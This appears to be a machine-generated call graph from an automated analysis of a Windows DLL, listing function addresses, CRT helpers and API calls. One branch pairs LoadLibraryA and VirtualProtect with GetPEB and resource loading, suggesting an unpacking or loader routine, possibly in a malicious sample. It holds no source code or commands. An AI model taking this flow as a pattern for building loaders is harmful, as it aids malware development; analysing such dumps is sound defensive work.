6c52a2bd 17510->17511 17513 6c52a3a7 ___lock_fhandle 17510->17513 17514 6c524618 __setenvp 67 API calls 17510->17514 17512 6c52a2cb 17511->17512 17515 6c524618 __setenvp 67 API calls 17511->17515 17516 6c52a2d9 17512->17516 17517 6c524618 __setenvp 67 API calls 17512->17517 17513->17102 17514->17511 17515->17512 17518 6c52a2e7 17516->17518 17519 6c524618 __setenvp 67 API calls 17516->17519 17517->17516 17520 6c52a2f5 17518->17520 17522 6c524618 __setenvp 67 API calls 17518->17522 17519->17518 17521 6c52a303 17520->17521 17523 6c524618 __setenvp 67 API calls 17520->17523 17524 6c52a311 17521->17524 17525 6c524618 __setenvp 67 API calls 17521->17525 17522->17520 17523->17521 17526 6c52a322 17524->17526 17527 6c524618 __setenvp 67 API calls 17524->17527 17525->17524 17528 6c52a914 __lock 67 API calls 17526->17528 17527->17526 17529 6c52a32a 17528->17529 17530 6c52a336 InterlockedDecrement 17529->17530 17536 6c52a34f 17529->17536 17532 6c52a341 17530->17532 17530->17536 17534 6c524618 __setenvp 67 API calls 17532->17534 17532->17536 17534->17536 17535 6c52a914 __lock 67 API calls 17537 6c52a363 17535->17537 17545 6c52a3b3 17536->17545 17538 6c52a394 17537->17538 17540 6c5304a3 ___removelocaleref 8 API calls 17537->17540 17548 6c52a3bf 17538->17548 17543 6c52a378 17540->17543 17542 6c524618 __setenvp 67 API calls 17542->17513 17543->17538 17544 6c5302cb ___freetlocinfo 67 API calls 17543->17544 17544->17538 17551 6c52a83a RtlLeaveCriticalSection 17545->17551 17547 6c52a35c 17547->17535 17552 6c52a83a RtlLeaveCriticalSection 17548->17552 17550 6c52a3a1 17550->17542 17551->17547 17552->17550 15856 6c5139b0 15899 6c517268 15856->15899 15861 6c517268 70 API calls 15863 6c513a19 15861->15863 15862 6c513a40 15908 6c512370 15862->15908 15863->15862 15864 6c511690 ctype 70 API calls 15863->15864 15864->15862 15866 6c513a69 15867 6c511690 ctype 70 API calls 15866->15867 15868 6c513a87 15866->15868 15867->15868 15941 6c511a10 15868->15941 15870 6c513b12 15871 6c513b77 15870->15871 15872 6c513b16 15870->15872 15873 6c513b81 15871->15873 15874 6c513c3b 15871->15874 15914 6c511000 15872->15914 15984 6c513090 15873->15984 16020 6c512c10 15874->16020 15879 6c513b8c 15993 6c5131f0 15879->15993 15880 6c513c49 16032 6c5115f0 15880->16032 15888 6c513b4c 15973 6c5112c0 15888->15973 15893 6c513b65 16041 6c515590 15893->16041 16059 6c511700 15899->16059 15902 6c511990 15903 6c5119b4 15902->15903 15904 6c5168e2 ctype 67 API calls 15903->15904 15905 6c5119be 15904->15905 15906 6c5168e2 ctype 67 API calls 15905->15906 15907 6c5119e7 15906->15907 15907->15861 15909 6c51239f ctype 15908->15909 15910 6c511690 ctype 70 API calls 15909->15910 15911 6c5123c2 15909->15911 15910->15911 16063 6c5114a0 15911->16063 15913 6c51240f 15913->15866 15915 6c51102d 15914->15915 15916 6c511042 15915->15916 15917 6c511690 ctype 70 API calls 15915->15917 15918 6c5131f0 105 API calls 15916->15918 15917->15916 15919 6c511068 15918->15919 15920 6c5115f0 70 API calls 15919->15920 15921 6c511077 15920->15921 15922 6c513e60 15921->15922 16118 6c523d6c 15922->16118 15924 6c514443 15925 6c5168e2 ctype 67 API calls 15924->15925 15927 6c514460 ctype 15925->15927 15926 6c513b35 15950 6c515070 15926->15950 15928 6c52527b __CxxThrowException@8 RaiseException 15927->15928 15929 6c5144ae 15928->15929 15930 6c516dc1 ctype 2 API calls 15929->15930 15930->15926 15931 6c5168e2 ctype 67 API calls 15937 6c513ea7 _memset 15931->15937 15936 6c51afc3 69 API calls 15936->15937 15937->15924 15937->15926 15937->15929 15937->15931 15937->15936 15940 6c5140fd 15937->15940 16128 6c515ca0 15937->16128 16141 6c516160 15937->16141 16146 6c51b1ec 15937->16146 15939 6c516750 ReadFile 15939->15940 15940->15937 15940->15939 16152 6c515e70 15940->16152 16158 6c5163f0 15940->16158 16186 6c51764f 15941->16186 15943 6c511a59 15944 6c511690 ctype 70 API calls 15943->15944 15945 6c511a7d 15943->15945 15949 6c511af7 15943->15949 15944->15945 16202 6c5172fd 15945->16202 15949->15870 15971 6c5150a6 15950->15971 15951 6c5153de 15952 6c516dc1 ctype 2 API calls 15951->15952 15954 6c5153e3 15952->15954 15953 6c5152bf 16344 6c5147d0 15953->16344 15957 6c5168e2 ctype 67 API calls 15954->15957 15955 6c51538f 15958 6c5168e2 ctype 67 API calls 15955->15958 15963 6c5153ea ctype 15957->15963 15965 6c515396 ctype 15958->15965 15959 6c51525a 15959->15951 15959->15953 15959->15954 16340 6c5145f0 15959->16340 15964 6c52527b __CxxThrowException@8 RaiseException 15963->15964 15967 6c515432 15964->15967 15966 6c52527b __CxxThrowException@8 RaiseException 15965->15966 15966->15951 15968 6c51530c 15968->15888 15969 6c5131f0 105 API calls 15969->15971 15970 6c512600 104 API calls 15970->15971 15971->15951 15971->15955 15971->15959 15971->15969 15971->15970 16289 6c514880 15971->16289 16311 6c514ac0 15971->16311 16334 6c515490 15971->16334 15974 6c5112d1 15973->15974 15975 6c5112ea 15973->15975 15974->15975 15976 6c511690 ctype 70 API calls 15974->15976 15977 6c517202 15975->15977 15976->15975 15978 6c517220 15977->15978 15979 6c517212 CloseHandle 15977->15979 15980 6c5112c0 ctype 70 API calls 15978->15980 15979->15978 15981 6c517232 15980->15981 15982 6c517244 ctype 15981->15982 15983 6c517236 GetLastError 15981->15983 15982->15893 15983->15982 16532 6c512f60 15984->16532 15986 6c51309f 15987 6c5130a7 15986->15987 15988 6c5130bc 15986->15988 16548 6c513370 15987->16548 16556 6c511580 15988->16556 15991 6c5130b8 15991->15879 15992 6c5130c7 15992->15879 15994 6c513222 15993->15994 15995 6c513237 15994->15995 15996 6c511690 ctype 70 API calls 15994->15996 15997 6c51aef1 ctype 100 API calls 15995->15997 15996->15995 15998 6c513254 15997->15998 16572 6c5133f0 FindResourceExW 15998->16572 16000 6c513268 16001 6c51326c 16000->16001 16002 6c51aef1 ctype 100 API calls 16000->16002 16003 6c511580 70 API calls 16001->16003 16004 6c5132bf 16002->16004 16012 6c513279 16003->16012 16005 6c5133f0 74 API calls 16004->16005 16006 6c5132d3 16005->16006 16007 6c5132d7 16006->16007 16008 6c513308 16006->16008 16009 6c511580 70 API calls 16007->16009 16010 6c51a58c 100 API calls 16008->16010 16009->16012 16011 6c51330e 16010->16011 16013 6c513325 16011->16013 16015 6c512a10 104 API calls 16011->16015 16017 6c512600 16012->16017 16014 6c512b50 104 API calls 16013->16014 16014->16012 16016 6c51331d 16015->16016 16016->16001 16016->16013 16599 6c511240 16017->16599 16021 6c512c51 16020->16021 16022 6c511690 ctype 70 API calls 16021->16022 16023 6c512c70 16021->16023 16022->16023 16024 6c5131f0 105 API calls 16023->16024 16030 6c512cc0 16023->16030 16026 6c512cad 16024->16026 16025 6c5131f0 105 API calls 16027 6c512cf9 16025->16027 16028 6c5244cb ctype 67 API calls 16026->16028 16029 6c512600 104 API calls 16027->16029 16028->16030 16031 6c512d0b moneypunct 16029->16031 16030->16025 16031->15880 16033 6c511606 16032->16033 16034 6c51165a 16032->16034 16035 6c511646 16033->16035 16037 6c511616 16033->16037 16034->15893 16036 6c5114a0 70 API calls 16035->16036 16038 6c511652 16036->16038 16039 6c511580 70 API calls 16037->16039 16038->15893 16040 6c51161d 16039->16040 16040->15893 16042 6c513d8b 16041->16042 16043 6c5155bb 16041->16043 16047 6c512490 16042->16047 16043->16042 16044 6c5131f0 105 API calls 16043->16044 16045 6c5155d1 16044->16045 16046 6c512600 104 API calls 16045->16046 16046->16042 16048 6c5124d1 16047->16048 16049 6c5124ed 16047->16049 16048->16049 16050 6c5112c0 ctype 70 API calls 16048->16050 16883 6c517343 16049->16883 16050->16049 16060 6c511708 16059->16060 16061 6c511716 16060->16061 16062 6c511690 ctype 70 API calls 16060->16062 16061->15902 16062->16061 16064 6c5114b6 16063->16064 16065 6c5114ac 16063->16065 16067 6c5114c9 16064->16067 16069 6c511690 ctype 70 API calls 16064->16069 16066 6c5112c0 ctype 70 API calls 16065->16066 16068 6c5114b1 16066->16068 16070 6c5114ed 16067->16070 16080 6c5113f0 16067->16080 16068->15913 16069->16067 16072 6c51150a 16070->16072 16073 6c5114fd 16070->16073 16102 6c523f43 16072->16102 16090 6c523fc0 16073->16090 16076 6c511508 16077 6c511525 16076->16077 16078 6c511690 ctype 70 API calls 16076->16078 16077->15913 16079 6c511542 16078->16079 16081 6c511401 16080->16081 16082 6c511330 16081->16082 16083 6c5113b0 16081->16083 16084 6c511364 16082->16084 16111 6c511550 16082->16111 16085 6c511550 70 API calls 16083->16085 16088 6c5113de 16083->16088 16087 6c523f43 _memcpy_s 67 API calls 16084->16087 16085->16088 16089 6c51137d 16087->16089 16088->16070 16089->16070 16091 6c523fd0 16090->16091 16101 6c523fe9 16090->16101 16092 6c523fd5 16091->16092 16093 6c523ff5 16091->16093 16094 6c525348 __cftof2_l 67 API calls 16092->16094 16096 6c523ffa 16093->16096 16097 6c524008 16093->16097 16095 6c523fda 16094->16095 16100 6c52815c __cftof2_l 6 API calls 16095->16100 16098 6c525348 __cftof2_l 67 API calls 16096->16098 16114 6c528190 16097->16114 16098->16095 16100->16101 16101->16076 16105 6c523f53 ___crtGetEnvironmentStringsA 16102->16105 16106 6c523f57 _memset 16102->16106 16103 6c523f5c 16104 6c525348 __cftof2_l 67 API calls 16103->16104 16110 6c523f61 16104->16110 16105->16076 16106->16103 16106->16105 16108 6c523fa6 16106->16108 16107 6c52815c __cftof2_l 6 API calls 16107->16105 16108->16105 16109 6c525348 __cftof2_l 67 API calls 16108->16109 16109->16110 16110->16107 16112 6c511690 ctype 70 API calls 16111->16112 16113 6c51155a 16112->16113 16115 6c5281a8 16114->16115 16116 6c5281cf __VEC_memcpy 16115->16116 16117 6c5281d7 16115->16117 16116->16117 16117->16101 16122 6c523d7f 16118->16122 16119 6c516dc1 ctype 2 API calls 16119->16122 16120 6c523dad 16121 6c5168e2 ctype 67 API calls 16120->16121 16127 6c523d92 _memset moneypunct 16121->16127 16122->16119 16122->16120 16123 6c523e3c 16122->16123 16122->16127 16124 6c5168e2 ctype 67 API calls 16123->16124 16125 6c523e45 16124->16125 16165 6c515ac0 16125->16165 16127->15937 16129 6c515cd6 16128->16129 16168 6c51afc3 16129->16168 16131 6c515d57 16132 6c51afc3 69 API calls 16131->16132 16133 6c515d61 16132->16133 16178 6c5164e0 16133->16178 16136 6c515eba GlobalAlloc 16137 6c515d97 16136->16137 16137->16136 16138 6c5167c3 16137->16138 16139 6c5160f0 CreateFileW 16137->16139 16139->16137 16140 6c5161de 16139->16140 16143 6c515de6 16141->16143 16142 6c515eba GlobalAlloc 16142->16143 16143->16142 16143->16143 16144 6c5161d2 16143->16144 16145 6c5160f0 CreateFileW 16143->16145 16145->16143 16145->16144 16147 6c51b201 16146->16147 16148 6c51b1fc 16146->16148 16150 6c51b211 16147->16150 16151 6c523d6c 69 API calls 16147->16151 16149 6c516dc1 ctype 2 API calls 16148->16149 16149->16147 16150->15937 16151->16150 16152->16152 16155 6c515de6 16152->16155 16153 6c5167c3 16154 6c515eba GlobalAlloc 16154->16155 16155->16153 16155->16154 16155->16155 16156 6c5160f0 CreateFileW 16155->16156 16156->16155 16157 6c5161de 16156->16157 16163 6c5163fe 16158->16163 16159 6c5166f0 16160 6c5165f3 LoadLibraryA VirtualProtect 16161 6c5167f8 16160->16161 16162 6c516649 VirtualProtect 16161->16162 16164 6c516663 16162->16164 16163->16159 16163->16160 16164->15937 16166 6c523f43 _memcpy_s 67 API calls 16165->16166 16167 6c515ad9 ctype 16166->16167 16167->16127 16170 6c51afd6 16168->16170 16169 6c516dc1 ctype 2 API calls 16169->16170 16170->16169 16171 6c51afe9 _memset moneypunct 16170->16171 16172 6c51b009 16170->16172 16174 6c51b08c 16170->16174 16171->16131 16173 6c5168e2 ctype 67 API calls 16172->16173 16173->16171 16175 6c5168e2 ctype 67 API calls 16174->16175 16176 6c51b094 16175->16176 16177 6c515ac0 67 API calls 16176->16177 16177->16171 16181 6c5164ea LoadLibraryA VirtualProtect 16178->16181 16184 6c5167f8 16181->16184 16183 6c515d67 GetPEB 16183->16137 16185 6c516649 VirtualProtect 16184->16185 16185->16183 16187 6c5112c0 ctype 70 API calls 16186->16187 16188 6c517696 16187->16188 16189 6c517807 16188->16189 16191 6c5176bd 16188->16191 16201 6c5177fb 16189->16201 16254 6c512330 16189->16254 16209 6c51748e 16191->16209 16192 6c523f34 _$I10_OUTPUT 5 API calls 16194 6c517835 16192->16194 16194->15943 16201->16192 16276 6c511440 16202->16276 16204 6c517312 _memset 16205 6c516a35 ctype 67 API calls 16204->16205 16206 6c517329 PathStripToRootW 16205->16206 16280 6c5171d8 16206->16280 16210 6c51749d __EH_prolog3_GS 16209->16210 16211 6c516dc1 ctype 2 API calls 16210->16211 16212 6c5174c7 GetFullPathNameW 16210->16212 16211->16210 16213 6c5174e0 16212->16213 16214 6c517505 16212->16214 16217 6c516a35 ctype 67 API calls 16213->16217 16215 6c517524 16214->16215 16216 6c517509 16214->16216 16218 6c511700 70 API calls 16215->16218 16220 6c512330 70 API calls 16216->16220 16234 6c5174fe ctype 16216->16234 16219 6c5174ef 16217->16219 16221 6c51752f 16218->16221 16222 6c51745f 71 API calls 16219->16222 16220->16234 16223 6c5172fd 71 API calls 16221->16223 16222->16234 16226 6c517540 PathIsUNCW 16223->16226 16227 6c517554 GetVolumeInformationW 16226->16227 16226->16234 16228 6c517577 16227->16228 16229 6c517596 16227->16229 16232 6c51745f 71 API calls 16228->16232 16230 6c5175a6 16229->16230 16231 6c51759f CharUpperW 16229->16231 16233 6c5175af FindFirstFileW 16230->16233 16230->16234 16231->16230 16232->16234 16233->16234 16235 6c5175c7 FindClose 16233->16235 16264 6c5251b5 16234->16264 16235->16228 16236 6c5175d7 16235->16236 16236->16228 16237 6c5175df lstrlenW 16236->16237 16238 6c51762d 16237->16238 16239 6c5175fc 16237->16239 16238->16234 16241 6c512330 70 API calls 16238->16241 16261 6c516ea0 16239->16261 16241->16234 16255 6c51233b 16254->16255 16256 6c51234a 16254->16256 16257 6c5114a0 70 API calls 16255->16257 16259 6c5114a0 70 API calls 16256->16259 16258 6c512344 16257->16258 16258->16201 16260 6c512369 16259->16260 16260->16201 16267 6c5251ed 16261->16267 16263 6c516eb3 ctype 16263->16234 16265 6c523f34 _$I10_OUTPUT 5 API calls 16264->16265 16266 6c5251bf 16265->16266 16266->16266 16268 6c525205 16267->16268 16269 6c5251fe 16267->16269 16270 6c525348 __cftof2_l 67 API calls 16268->16270 16269->16268 16272 6c525231 16269->16272 16275 6c52520a 16270->16275 16271 6c52815c __cftof2_l 6 API calls 16273 6c525219 16271->16273 16272->16273 16274 6c525348 __cftof2_l 67 API calls 16272->16274 16273->16263 16274->16275 16275->16271 16277 6c511465 16276->16277 16278 6c51145d 16276->16278 16277->16204 16279 6c5113f0 70 API calls 16278->16279 16279->16277 16281 6c5171e8 16280->16281 16284 6c511470 16281->16284 16285 6c511478 16284->16285 16286 6c511690 ctype 70 API calls 16285->16286 16287 6c51147f GetDiskFreeSpaceW 16285->16287 16288 6c511497 16286->16288 16287->15949 16290 6c5148be 16289->16290 16291 6c511690 ctype 70 API calls 16290->16291 16292 6c5148d3 16290->16292 16291->16292 16293 6c511690 ctype 70 API calls 16292->16293 16294 6c514908 16292->16294 16293->16294 16295 6c5115f0 70 API calls 16294->16295 16296 6c51493e 16295->16296 16348 6c5130e0 16296->16348 16298 6c51496f 16299 6c514a3d 16298->16299 16351 6c513150 16298->16351 16302 6c523f34 _$I10_OUTPUT 5 API calls 16299->16302 16304 6c514aae 16302->16304 16303 6c5115f0 70 API calls 16305 6c514996 16303->16305 16304->15971 16357 6c515670 16305->16357 16307 6c5149d6 16308 6c51afc3 69 API calls 16307->16308 16309 6c5149f9 ___crtGetEnvironmentStringsA 16308->16309 16309->16299 16310 6c524618 __setenvp 67 API calls 16309->16310 16310->16299 16312 6c514b00 16311->16312 16523 6c513720 16312->16523 16335 6c5154f7 16334->16335 16337 6c5154be 16334->16337 16336 6c5131f0 105 API calls 16335->16336 16335->16337 16338 6c51551a 16336->16338 16337->15971 16339 6c512600 104 API calls 16338->16339 16339->16337 16341 6c514616 16340->16341 16342 6c523f34 _$I10_OUTPUT 5 API calls 16341->16342 16343 6c5146ee 16342->16343 16343->15959 16345 6c5147f9 16344->16345 16346 6c523f34 _$I10_OUTPUT 5 API calls 16345->16346 16347 6c514873 16346->16347 16347->15968 16369 6c512b50 16348->16369 16350 6c5130f2 _wcspbrk 16350->16298 16352 6c51318b 16351->16352 16353 6c5131a0 16352->16353 16354 6c511690 ctype 70 API calls 16352->16354 16355 6c512600 104 API calls 16353->16355 16354->16353 16356 6c5131d7 16355->16356 16356->16303 16358 6c515681 lstrlenW 16357->16358 16359 6c51567b 16357->16359 16410 6c515730 16358->16410 16359->16307 16362 6c5156c5 GetLastError 16364 6c5156d0 WideCharToMultiByte 16362->16364 16366 6c515716 16362->16366 16363 6c51571f 16363->16307 16365 6c515730 76 API calls 16364->16365 16367 6c5156f4 WideCharToMultiByte 16365->16367 16366->16363 16427 6c515b00 GetLastError 16366->16427 16367->16366 16370 6c512b7e 16369->16370 16371 6c511690 ctype 70 API calls 16370->16371 16372 6c512b93 16370->16372 16371->16372 16373 6c512bb9 16372->16373 16375 6c512bd1 16372->16375 16380 6c51a58c 16373->16380 16375->16375 16376 6c5114a0 70 API calls 16375->16376 16377 6c512bcf 16376->16377 16377->16350 16400 6c51aef1 16380->16400 16383 6c512a10 FindResourceW 16384 6c512a45 16383->16384 16385 6c512a34 16383->16385 16384->16377 16405 6c5128d0 LoadResource 16385->16405 16387 6c512a3c 16387->16384 16388 6c512a6e 16387->16388 16389 6c5113f0 70 API calls 16387->16389 16390 6c523f43 _memcpy_s 67 API calls 16388->16390 16389->16388 16391 6c512aa0 ctype 16390->16391 16392 6c512ab5 16391->16392 16393 6c511690 ctype 70 API calls 16391->16393 16392->16377 16394 6c512ad5 16393->16394 16395 6c51a58c 100 API calls 16394->16395 16396 6c512aee 16395->16396 16397 6c512af2 16396->16397 16398 6c512a10 103 API calls 16396->16398 16397->16377 16399 6c512b00 16398->16399 16399->16377 16401 6c51c050 ctype 94 API calls 16400->16401 16402 6c51af00 16401->16402 16403 6c512bc2 16402->16403 16404 6c51bb0c ctype 8 API calls 16402->16404 16403->16377 16403->16383 16404->16402 16406 6c5128e6 16405->16406 16407 6c5128e9 LockResource 16405->16407 16406->16387 16408 6c51290a 16407->16408 16409 6c5128f7 SizeofResource 16407->16409 16408->16387 16409->16408 16411 6c515734 16410->16411 16412 6c51573e 16410->16412 16413 6c511690 ctype 70 API calls 16411->16413 16414 6c51574c 16412->16414 16415 6c511690 ctype 70 API calls 16412->16415 16413->16412 16416 6c511690 ctype 70 API calls 16414->16416 16419 6c51575a 16414->16419 16415->16414 16416->16419 16417 6c515788 16423 6c51569f WideCharToMultiByte 16417->16423 16425 6c511690 ctype 70 API calls 16417->16425 16442 6c524721 16417->16442 16418 6c515782 16422 6c524618 __setenvp 67 API calls 16418->16422 16419->16417 16419->16418 16431 6c5246a6 16419->16431 16422->16417 16423->16362 16423->16363 16424 6c515771 16424->16417 16426 6c511690 ctype 70 API calls 16424->16426 16425->16417 16426->16418 16428 6c515b0a 16427->16428 16429 6c511690 ctype 70 API calls 16428->16429 16430 6c515b1a 16429->16430 16432 6c5246b5 16431->16432 16433 6c5246dd 16431->16433 16432->16433 16435 6c5246c1 16432->16435 16434 6c5246f2 16433->16434 16449 6c527637 16433->16449 16462 6c524ac8 16434->16462 16438 6c525348 __cftof2_l 67 API calls 16435->16438 16439 6c5246c6 16438->16439 16440 6c52815c __cftof2_l 6 API calls 16439->16440 16441 6c5246d6 _memset 16440->16441 16441->16424 16506 6c52b40b 16442->16506 16444 6c52473b 16445 6c525348 __cftof2_l 67 API calls 16444->16445 16448 6c524757 16444->16448 16446 6c52474e 16445->16446 16447 6c525348 __cftof2_l 67 API calls 16446->16447 16446->16448 16447->16448 16448->16417 16450 6c527643 ___lock_fhandle 16449->16450 16451 6c527653 16450->16451 16452 6c527670 16450->16452 16454 6c525348 __cftof2_l 67 API calls 16451->16454 16453 6c5276b1 RtlSizeHeap 16452->16453 16456 6c52a914 __lock 67 API calls 16452->16456 16458 6c527668 ___lock_fhandle 16453->16458 16455 6c527658 16454->16455 16457 6c52815c __cftof2_l 6 API calls 16455->16457 16459 6c527680 ___sbh_find_block 16456->16459 16457->16458 16458->16434 16498 6c5276d1 16459->16498 16463 6c524ad4 ___lock_fhandle 16462->16463 16464 6c524adb 16463->16464 16465 6c524ae9 16463->16465 16468 6c5249fe _malloc 67 API calls 16464->16468 16466 6c524af0 16465->16466 16467 6c524afc 16465->16467 16469 6c524618 __setenvp 67 API calls 16466->16469 16474 6c524c6e 16467->16474 16490 6c524b09 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 16467->16490 16488 6c524ae3 ___lock_fhandle __dosmaperr 16468->16488 16469->16488 16470 6c524ca1 16472 6c52c08e _malloc 6 API calls 16470->16472 16471 6c524c73 RtlReAllocateHeap 16471->16474 16471->16488 16475 6c524ca7 16472->16475 16473 6c52a914 __lock 67 API calls 16473->16490 16474->16470 16474->16471 16476 6c524cc5 16474->16476 16478 6c52c08e _malloc 6 API calls 16474->16478 16480 6c524cbb 16474->16480 16477 6c525348 __cftof2_l 67 API calls 16475->16477 16479 6c525348 __cftof2_l 67 API calls 16476->16479 16476->16488 16477->16488 16478->16474 16481 6c524cce GetLastError 16479->16481 16483 6c525348 __cftof2_l 67 API calls 16480->16483 16481->16488 16497 6c524c3c 16483->16497 16484 6c524b94 RtlAllocateHeap 16484->16490 16485 6c524c41 GetLastError 16485->16488 16486 6c524be9 RtlReAllocateHeap 16486->16490 16487 6c52b126 ___sbh_alloc_block 5 API calls 16487->16490 16488->16441 16489 6c524c54 16489->16488 16493 6c525348 __cftof2_l 67 API calls 16489->16493 16490->16470 16490->16473 16490->16484 16490->16486 16490->16487 16490->16488 16490->16489 16491 6c52c08e _malloc 6 API calls 16490->16491 16492 6c52a977 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 16490->16492 16494 6c524c37 16490->16494 16502 6c524c0c 16490->16502 16491->16490 16492->16490 16495 6c524c61 16493->16495 16496 6c525348 __cftof2_l 67 API calls 16494->16496 16495->16481 16495->16488 16496->16497 16497->16485 16497->16488 16501 6c52a83a RtlLeaveCriticalSection 16498->16501 16500 6c5276ac 16500->16453 16500->16458 16501->16500 16505 6c52a83a RtlLeaveCriticalSection 16502->16505 16504 6c524c13 16504->16490 16505->16504 16507 6c52b417 ___lock_fhandle 16506->16507 16508 6c52b42f 16507->16508 16518 6c52b44e _memset 16507->16518 16509 6c525348 __cftof2_l 66 API calls 16508->16509 16510 6c52b434 16509->16510 16512 6c52815c __cftof2_l 6 API calls 16510->16512 16511 6c52b4c0 RtlAllocateHeap 16511->16518 16515 6c52b444 ___lock_fhandle 16512->16515 16513 6c52c08e _malloc 6 API calls 16513->16518 16514 6c52a914 __lock 66 API calls 16514->16518 16515->16444 16516 6c52b126 ___sbh_alloc_block 5 API calls 16516->16518 16518->16511 16518->16513 16518->16514 16518->16515 16518->16516 16519 6c52b507 16518->16519 16522 6c52a83a RtlLeaveCriticalSection 16519->16522 16521 6c52b50e 16521->16518 16522->16521 16524 6c513756 16523->16524 16525 6c51afc3 69 API calls 16524->16525 16526 6c513769 16525->16526 16527 6c5160f0 CreateFileW 16526->16527 16528 6c5161de 16527->16528 16531 6c515de6 16527->16531 16529 6c515eba GlobalAlloc 16529->16531 16530 6c5167c3 16531->16527 16531->16529 16531->16530 16533 6c511580 70 API calls 16532->16533 16534 6c512f92 16533->16534 16535 6c5113f0 70 API calls 16534->16535 16536 6c512fc2 __wcsrev 16534->16536 16535->16536 16537 6c511690 ctype 70 API calls 16536->16537 16543 6c512fe0 _wcspbrk 16536->16543 16538 6c513080 16537->16538 16539 6c512f60 70 API calls 16538->16539 16540 6c51309f 16539->16540 16541 6c5130a7 16540->16541 16542 6c5130bc 16540->16542 16544 6c513370 70 API calls 16541->16544 16545 6c511580 70 API calls 16542->16545 16543->15986 16546 6c5130b8 16544->16546 16547 6c5130c7 16545->16547 16546->15986 16547->15986 16549 6c513386 16548->16549 16550 6c513391 16549->16550 16553 6c5133af 16549->16553 16551 6c511580 70 API calls 16550->16551 16552 6c51339a 16551->16552 16552->15991 16563 6c513680 16553->16563 16558 6c51158f 16556->16558 16557 6c51159c 16557->15992 16558->16557 16559 6c5115c5 16558->16559 16561 6c511550 70 API calls 16558->16561 16560 6c523f43 _memcpy_s 67 API calls 16559->16560 16562 6c5115e1 16560->16562 16561->16559 16562->15992 16564 6c51368b 16563->16564 16568 6c513695 16563->16568 16565 6c511690 ctype 70 API calls 16564->16565 16565->16568 16566 6c511690 ctype 70 API calls 16566->16568 16567 6c511550 70 API calls 16567->16568 16568->16566 16568->16567 16569 6c5136d1 16568->16569 16570 6c523f43 _memcpy_s 67 API calls 16569->16570 16571 6c5133e6 16570->16571 16571->15991 16573 6c51341f 16572->16573 16574 6c51340e 16572->16574 16573->16000 16575 6c5128d0 3 API calls 16574->16575 16576 6c513416 16575->16576 16576->16573 16577 6c513447 16576->16577 16578 6c5113f0 70 API calls 16576->16578 16579 6c523f43 _memcpy_s 67 API calls 16577->16579 16578->16577 16580 6c51347e ctype 16579->16580 16581 6c513493 16580->16581 16582 6c511690 ctype 70 API calls 16580->16582 16581->16000 16583 6c5134b0 16582->16583 16584 6c511690 ctype 70 API calls 16583->16584 16585 6c513530 16583->16585 16584->16585 16588 6c5135f0 16585->16588 16589 6c513621 16588->16589 16590 6c513619 16588->16590 16592 6c523f43 _memcpy_s 67 API calls 16589->16592 16591 6c5113f0 70 API calls 16590->16591 16591->16589 16593 6c513634 16592->16593 16594 6c523f43 _memcpy_s 67 API calls 16593->16594 16595 6c513649 16594->16595 16596 6c513582 16595->16596 16597 6c511690 ctype 70 API calls 16595->16597 16596->16000 16598 6c513673 16597->16598 16600 6c511256 16599->16600 16601 6c51124c 16599->16601 16612 6c524320 16600->16612 16602 6c511690 ctype 70 API calls 16601->16602 16602->16600 16605 6c511286 16615 6c5241a0 16605->16615 16606 6c5113f0 70 API calls 16606->16605 16609 6c5112a2 16609->15893 16610 6c511690 ctype 70 API calls 16611 6c5112be 16610->16611 16618 6c5242c9 16612->16618 16624 6c524115 16615->16624 16619 6c5242d9 16618->16619 16623 6c511263 16618->16623 16620 6c525348 __cftof2_l 67 API calls 16619->16620 16621 6c5242de 16620->16621 16622 6c52815c __cftof2_l 6 API calls 16621->16622 16622->16623 16623->16605 16623->16606 16625 6c524122 16624->16625 16626 6c52413f 16624->16626 16627 6c525348 __cftof2_l 67 API calls 16625->16627 16628 6c52414c 16626->16628 16630 6c524159 16626->16630 16629 6c524127 16627->16629 16631 6c525348 __cftof2_l 67 API calls 16628->16631 16632 6c52815c __cftof2_l 6 API calls 16629->16632 16639 6c52401d 16630->16639 16638 6c524151 16631->16638 16636 6c511294 16632->16636 16635 6c52815c __cftof2_l 6 API calls 16635->16636 16636->16609 16636->16610 16637 6c525348 __cftof2_l 67 API calls 16637->16638 16638->16635 16640 6c52404d 16639->16640 16641 6c52402d 16639->16641 16643 6c52405d 16640->16643 16649 6c52407d 16640->16649 16642 6c525348 __cftof2_l 67 API calls 16641->16642 16644 6c524032 16642->16644 16645 6c525348 __cftof2_l 67 API calls 16643->16645 16646 6c52815c __cftof2_l 6 API calls 16644->16646 16647 6c524062 16645->16647 16652 6c524042 16646->16652 16648 6c52815c __cftof2_l 6 API calls 16647->16648 16648->16652 16650 6c5240c4 16649->16650 16649->16652 16654 6c5284f5 16649->16654 16650->16652 16653 6c5284f5 __flsbuf 101 API calls 16650->16653 16652->16636 16652->16637 16653->16652 16675 6c52fbb6 16654->16675 16657 6c528510 16659 6c525348 __cftof2_l 67 API calls 16657->16659 16658 6c528527 16660 6c52852b 16658->16660 16669 6c528538 __flsbuf 16658->16669 16668 6c528515 16659->16668 16661 6c525348 __cftof2_l 67 API calls 16660->16661 16661->16668 16662 6c528628 16666 6c52f878 __locking 101 API calls 16662->16666 16663 6c5285a8 16664 6c5285bf 16663->16664 16665 6c5285dc 16663->16665 16693 6c52f878 16664->16693 16665->16668 16718 6c52f02c 16665->16718 16666->16668 16668->16650 16669->16668 16671 6c52858e 16669->16671 16674 6c528599 16669->16674 16681 6c52f99d 16669->16681 16671->16674 16690 6c52f954 16671->16690 16674->16662 16674->16663 16676 6c52fbc5 16675->16676 16678 6c528505 16675->16678 16677 6c525348 __cftof2_l 67 API calls 16676->16677 16679 6c52fbca 16677->16679 16678->16657 16678->16658 16680 6c52815c __cftof2_l 6 API calls 16679->16680 16680->16678 16682 6c52f9aa 16681->16682 16683 6c52f9b9 16681->16683 16684 6c525348 __cftof2_l 67 API calls 16682->16684 16685 6c52f9dd 16683->16685 16686 6c525348 __cftof2_l 67 API calls 16683->16686 16687 6c52f9af 16684->16687 16685->16671 16688 6c52f9cd 16686->16688 16687->16671 16689 6c52815c __cftof2_l 6 API calls 16688->16689 16689->16685 16750 6c52a5c3 16690->16750 16694 6c52f884 ___lock_fhandle 16693->16694 16695 6c52f8a7 16694->16695 16696 6c52f88c 16694->16696 16698 6c52f8b5 16695->16698 16701 6c52f8f6 16695->16701 16755 6c52535b 16696->16755 16700 6c52535b __dosmaperr 67 API calls 16698->16700 16703 6c52f8ba 16700->16703 16758 6c5319c1 16701->16758 16702 6c525348 __cftof2_l 67 API calls 16705 6c52f899 ___lock_fhandle 16702->16705 16706 6c525348 